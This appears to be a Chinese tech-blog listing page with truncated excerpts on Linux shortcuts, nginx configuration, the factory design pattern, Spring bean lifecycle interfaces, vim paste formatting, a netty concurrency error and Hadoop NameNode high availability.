    一.linux快捷键 Ctrl+C : 终止当前命令 Ctrl+S : 暂停屏幕输出 Ctrl+Q : 恢复屏幕输出 Ctrl+U : 删除当前行光标前的所有字符 Ctrl+Z : 挂起当前正在执行的进程 Ctrl+L : 清除终端屏幕,相当于clear   二.终端命令 clear : 清除终端屏幕 reset : 重置视窗,当屏幕编码混乱时使用 time com
  • NGINX IXHONG nginx
    pcre 编译安装 nginx conf/vhost/test.conf   upstream admin { server 127.0.0.1:8080; }   server {                 listen       80; &
  • 设计模式--工厂模式 kerryg 设计模式
    工厂方式模式分为三种:   1、普通工厂模式:建立一个工厂类,对实现了同一个接口的一些类进行实例的创建。   2、多个工厂方法的模式:就是对普通工厂方法模式的改进,在普通工厂方法模式中,如果传递的字符串出错,则不能正确创建对象,而多个工厂方法模式就是提供多个工厂方法,分别创建对象。   3、静态工厂方法模式:就是将上面的多个工厂方法模式里的方法置为静态,
  • Spring InitializingBean/init-method和DisposableBean/destroy-method mx_xiehd javaspringbeanxml
    1.initializingBean/init-method 实现org.springframework.beans.factory.InitializingBean接口允许一个bean在它的所有必须属性被BeanFactory设置后,来执行初始化的工作,InitialzingBean仅仅指定了一个方法。 通常InitializingBean接口的使用是能够被避免的,(不鼓励使用,因为没有必要
  • 解决Centos下vim粘贴内容格式混乱问题 qindongliang1922 centosvim
    有时候,我们在向vim打开的一个xml,或者任意文件中,拷贝粘贴的代码时,格式莫名其毛的就混乱了,然后自己一个个再重新,把格式排列好,非常耗时,而且很不爽,那么有没有办法避免呢? 答案是肯定的,设置下缩进格式就可以了,非常简单: 在用户的根目录下 直接vi  ~/.vimrc文件 然后将set pastetoggle=<F9> 写入这个文件中,保存退出,重新登录,
  • netty大并发请求问题 tianzhihehe netty
    多线程并发使用同一个channel java.nio.BufferOverflowException: null at java.nio.HeapByteBuffer.put(HeapByteBuffer.java:183) ~[na:1.7.0_60-ea] at java.nio.ByteBuffer.put(ByteBuffer.java:832) ~[na:1.7.0_60-ea]
  • Hadoop NameNode单点问题解决方案之一 AvatarNode wyz2009107220 NameNode
    我们遇到的情况 Hadoop NameNode存在单点问题。这个问题会影响分布式平台24*7运行。先说说我们的情况吧。 我们的团队负责管理一个1200节点的集群(总大小12PB),目前是运行版本为Hadoop 0.20,transaction logs写入一个共享的NFS filer(注:NetApp NFS Filer)。 经常遇到需要中断服务的问题是给hadoop打补丁。 DataNod
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他